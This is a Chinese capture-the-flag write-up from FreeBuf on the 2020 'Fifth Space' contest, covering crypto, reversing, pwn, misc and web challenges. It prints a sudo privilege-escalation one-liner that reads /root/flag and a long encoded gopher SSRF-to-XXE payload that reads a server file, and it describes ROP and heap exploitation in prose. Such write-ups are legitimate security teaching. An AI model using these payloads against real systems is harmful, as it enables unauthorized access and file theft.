freeBuf
主站

分类

云安全 AI安全 开发安全 终端安全 数据安全 Web安全 基础安全 企业安全 关基安全 移动安全 系统安全 其他安全

特色

热点 工具 漏洞 人物志 活动 安全招聘 攻防演练 政策法规

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

“第五空间”智能安全大赛部分WP
蚁景科技 2020-06-28 14:32:33 236328
所属地 湖南省

第五空间6月24日比赛的部分WP.

目录

image.php?url=0PiEuOzWVy

crypto

rosb

rsa共模攻击,网上找了个板子改了改

image.php?url=0PiEuOHuJJ

image.php?url=0PiEuOj1VT

re

nop

main函数里存在三个需要nop的反调试的函数(共五处),nop后的逻辑是:输入数字,然后通过eax一直加(大约是反调试jump的次数)+0xCCCCCCCC,最后的值用于在函数sub_8048691中patch eaxeax+1的值为0x90。因此正确的patch才能跳转到right处,由于中间eax+1有点多不想数b,所以大概算了个值(考虑一下32位溢出),然后前后遍历了一小段数字,得到flag为99357990

rev

本意是一个rop导向的逆向题,但写trace太麻烦了,所以试了下angr的模板,正好可以用,注意一下输入参数为argv1

image.php?url=0PiEuOw34X

pwn

twice

第一次溢出一个字节用于泄露canary和栈地址,第二次溢出0x20字节,其中除了填写canary外,rbp位置存放字符串起始栈地址-8,返回地址填leave ret,这样就可以多出88字节的ROP。ROP主体为puts泄露libc地址、readbss(也可以继续往栈上)写入system("/bin/sh\x00")的另一段ROP,最后栈转移,正好`88字节。

image.php?url=0PiEuOtG3F

image.php?url=0PiEuOAgbg

image.php?url=0PiEuOgWV7

运行实例:

print(p.pid)

p.interactive

pwnme

因为除了off-one-null-byte外更严重的是有任意长度堆溢出的操作,一开始想的是使用overlapping,但因为环境一直搭不起来拿不到unsortedbin的偏移,又看到没开PIE并且GOT表可写,所以最后换了unlink来做。unlink后泄露free地址再填入system地址一把梭。

image.php?url=0PiEuOSoHv

image.php?url=0PiEuO243A

image.php?url=0PiEuO2YoT

运行实例:image.php?url=0PiEuOMucS

of

只给源码的pwn,先把tcache填满使得后续堆块释放到fastbin,然后利用scanf触发malloc_consolidate释放到unsortedbin泄露libc地址,最后便是常规改__free_hook的操作。这里比较奇怪的是泄露的unsortedbin的地址多了0x100,第一次见这种操作。

image.php?url=0PiEuOtXNO

image.php?url=0PiEuOMLdA

image.php?url=0PiEuOgkyM

misc

签到

flag{https://5space.360.cn}

麒麟系统

提权root权限,访问/root/flag,获取内容

user:kylin-user pwd:FifthSpace360

118.26.139.133:22IP地址更换118.26.139.133:22

sudo配置不当可以以root权限执行

sudo -u#-1 cat /root/flag

loop

tar和zip循环解压,用下面的脚本跑五六次差不多能拿到flag的文件

import osfor i in range(100): os.system('tar -xvf tarfile') os.system('unzip -o zipfile')# flag{a4944cc1-0e50-44d3-9d85-6c52a3387330}

philosophy

一开始打算当作逆向来做,但使用DIE看时发现资源区段显示加壳,很可疑。

image.php?url=0PiEuOoT8S

查看资源区段,果然有FL4G字样。

image.php?url=0PiEuOVv8z

因此直接用Resource Hacker查看,发现非常明显的PNG结构特征。

提出来改一下PNG头前四个字节即可看到FLAG

image.php?url=0PiEuOibTf

run

很大的run.exewin10桌面显示是个word,想起来word本来也是压缩包,解压了一下拿到一个word和一个小的run.exe,跑了一下发现出来一个tif文件

image.php?url=0PiEuOcGOK

改了后缀以后用ps打开,黑色块可以移动,移开后得到

image.php?url=0PiEuOlP1h

而tif文件的最后有run.exe加上的run->njCp1HJBPLVTxcMhUHDPwE7mPW,因此试了下有无flag{}``,有无run->`,最后正确的是

image.php?url=0PiEuOGrqY

web

hate-php

没有过滤 ~直接用取反,unicode字符用url编码

phpinfo验证

image.php?url=0PiEuONSEb

do you know

index.php的限制条件可以随意填写,只要符合条件就可以了

image.php?url=0PiEuOoOiB

foreach循环中会遍历$_GET并把遍历最后的值赋给url,此处存在SSRF可以访问 xxe.php

xxe.php处存在XXE漏洞,但是需要绕过过滤,不过这个过滤只过滤一次,所以直接双写就可以了

image.php?url=0PiEuO391y

问题在于xxe需要post访问,我们现在有SSRF所以使用gopher可以发出post包

XXE payload

image.php?url=0PiEuOQzG0

用 gopher 发送

a1=b&a2=b&c=gopher://127.0.0.1:80/_%2550%254f%2553%2554%2520%252f%2578%2578%2565%252e%2570%2568%2570%2520%2548%2554%2554%2550%252f%2531%252e%2531%250d%250a%2548%256f%2573%2574%253a%2520%2531%2532%2537%252e%2530%252e%2530%252e%2531%250d%250a%2543%256f%256e%2574%2565%256e%2574%252d%254c%2565%256e%2567%2574%2568%253a%2520%2532%2531%2536%250d%250a%2543%256f%256e%2574%2565%256e%2574%252d%2554%2579%2570%2565%253a%2520%2561%2570%2570%256c%2569%2563%2561%2574%2569%256f%256e%252f%2578%252d%2577%2577%2577%252d%2566%256f%2572%256d%252d%2575%2572%256c%2565%256e%2563%256f%2564%2565%2564%250d%250a%250d%250a%2564%2561%2574%2561%253d%2525%2533%2543%2525%2532%2531%2544%254f%2543%2554%2559%2550%2545%252b%2566%256f%256f%252b%2525%2535%2542%2525%2530%2544%2525%2530%2541%2525%2533%2543%2525%2532%2531%2545%254c%2545%254d%2545%254e%2554%252b%2566%256f%256f%252b%2541%254e%2559%252b%2525%2533%2545%2525%2530%2544%2525%2530%2541%2525%2533%2543%2525%2532%2531%2545%254e%2554%2549%2554%2559%252b%2578%252b%2553%2559%2553%2554%2545%254d%252b%2525%2532%2532%2570%2568%2570%2525%2533%2541%2525%2532%2546%2525%2532%2546%2566%2569%256c%2574%2565%2572%2525%2532%2546%2563%256f%256e%2576%2565%2572%2574%252e%2562%2561%2573%2565%2536%2534%252d%2565%256e%2563%256f%2564%2565%2525%2532%2546%2572%2565%2573%256f%2575%2572%2563%2565%2525%2533%2544%252e%2525%2532%2546%2566%256c%2566%256c%2561%2567%2561%2567%252e%2570%2568%2570%2525%2532%2532%2525%2533%2545%2525%2535%2544%2525%2533%2545%2525%2530%2544%2525%2530%2541%2525%2533%2543%2575%2573%2565%2572%2525%2533%2545%2525%2532%2536%2578%2525%2533%2542%2525%2533%2543%2525%2532%2546%2575%2573%2565%2572%2525%2533%2545%252b%252b%252b%252b%252b%252b%252b%252b

得到flag ,base 解码一下

image.php?url=0PiEuOlOVL

美团外卖

源码www.zip审计发现,daochu.php存在sql语句,并且与login比起来,没有过滤

image.php?url=0PiEuOAwPp

发现给了路径,但是暂时还不知道什么用

继续审计

发现有ueditor和webuploader,需要结合hint中的路径访问

在webuploader里有preview.php可以上传图片

image.php?url=0PiEuOCno3

payload

image.php?url=0PiEuObNnL

image.php?url=0PiEuORSN5

image.php?url=0PiEuOgxMd

这里???啥意思get file。。。我的shell呢?

image.php?url=0PiEuOWCXW

。。。。。天才出题人

flag{g879aee87y8501c1deab01c7b54f2fa9}

laravel(unsolved)

寻找POP链

image.php?url=0PiEuOMaIK

image.php?url=0PiEuOfa5S

flag{90569859b0164266ef04461bbc1d5cc5}

zzm blog(unsolved)

CVE-2019-12086配合 JDBC autoDeserialize 绕过黑名单

image.php?url=0PiEuOjkLE

本文系合天智汇原创,转载请注明出处。


# 合天网安
本文为 蚁景科技 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
渗透测试和实践
安全渗透与测试
蚁景科技 LV.9
湖南蚁景科技有限公司主要从事在线教育平台技术研究及网络培训产品研发,专注网络空间安全实用型人才培养,全面提升用户动手实践能力。
  • 907 文章数
  • 675 关注者
蚁景科技荣膺双项殊荣,引领网络安全教育新潮流
2025-03-28
FlowiseAI 任意文件写入漏洞(CVE-2025–26319)
2025-03-27
路由器安全研究:D-Link DIR-823G v1.02 B05 复现与利用思路
2025-03-18
文章目录